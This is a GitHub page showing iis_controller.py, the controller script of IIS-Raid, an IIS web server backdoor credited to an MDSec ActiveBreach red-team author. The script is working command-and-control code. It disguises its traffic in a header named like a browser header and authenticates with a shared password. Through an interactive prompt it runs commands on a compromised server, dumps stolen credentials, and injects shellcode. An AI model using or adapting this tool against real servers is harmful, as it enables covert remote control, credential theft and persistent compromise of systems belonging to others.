-
Notifications
You must be signed in to change notification settings - Fork 122
/
iis_controller.py
123 lines (86 loc) · 3.5 KB
/
iis_controller.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
import requests
import argparse
import base64
import cmd
banner = '''
██╗██╗███████╗ ██████╗ █████╗ ██╗██████╗
██║██║██╔════╝ ██╔══██╗██╔══██╗██║██╔══██╗
██║██║███████╗█████╗██████╔╝███████║██║██║ ██║
██║██║╚════██║╚════╝██╔══██╗██╔══██║██║██║ ██║
██║██║███████║ ██║ ██║██║ ██║██║██████╔╝
╚═╝╚═╝╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═════╝
@0x09AL - MDSec ActiveBreach
'''
print(banner)
class Prompt(cmd.Cmd):
def help_cmd(self):
print("Execute a command on the server.\nUsage: cmd <command to execute>\n")
def help_exit(self):
print("Exits")
def help_inject(self):
print("Inject shellcode on the server.\nUsage: inject <file>\n")
def help_dump(self):
print("Dump extracted credentials.\nUsage: dump\n")
def do_inject(self,shellcode):
InjectShellcode(shellcode)
def do_cmd(self, command):
if(command != ""):
ExecuteCommand(command)
else:
print("Specify a command.")
def do_dump(self,ignore):
DumpCreds()
def do_exit(self,ignore):
exit(0)
def emptyline(self):
pass
def SendRequest(data):
if(args.method == "GET"):
resp = requests.get(args.url,headers={args.header: data , "X-Password": args.password})
elif(args.method == "POST"):
resp = requests.post(args.url,headers={args.header: data , "X-Password": args.password})
if(resp.status_code != 200):
print("[-] Status code invalid : " + str(resp.status_code))
exit(0)
try:
encoded_response = resp.headers[args.header]
except:
print("[-] Header not found. Invalid password or backdoor is not present. [-]")
exit(0)
response = base64.b64decode(encoded_response).decode('utf-8')
return response
def Check():
print("[+] Testing URL {0}".format(args.url))
response = SendRequest("PIN|G")
if(response == "PONG"):
print("[+] Successfully connected to {0}\n".format(args.url))
return True
else:
return False
def ExecuteCommand(command):
response = SendRequest("CMD|" + command)
print("[+] Received output [+]\n{0}".format(response))
def DumpCreds():
response = SendRequest("DMP|CREDS")
print("[+] Received output [+]\n{0}".format(response))
def InjectShellcode(file):
with open(file, "rb") as binaryfile :
shellcode = bytearray(binaryfile.read())
encoded_shellcode = base64.b64encode(shellcode).decode("utf-8")
print("[+] Shellcode size : {0}".format(len(shellcode)))
response = SendRequest("INJ|" + encoded_shellcode)
if(response == "DONE"):
print("[+] Shellcode Injected Successfully")
# IIS-Raid
parser = argparse.ArgumentParser(description="IIS-Raid Controller")
parser.add_argument('--url', required=True , type=str ,help="URL to use for communication.")
parser.add_argument('--header', type=str, default="X-Chrome-Variations", help="Header to use for communication.")
parser.add_argument('--method', type=str, default="GET", help="Method to use for communication.")
parser.add_argument('--password', required=True,type=str, help="Pre-shared password.")
args = parser.parse_args()
if(Check()):
p = Prompt()
p.prompt = "IIS-RAID #> "
p.cmdloop()
else:
print("[-] Failed to connect to {0} ".format(args.url))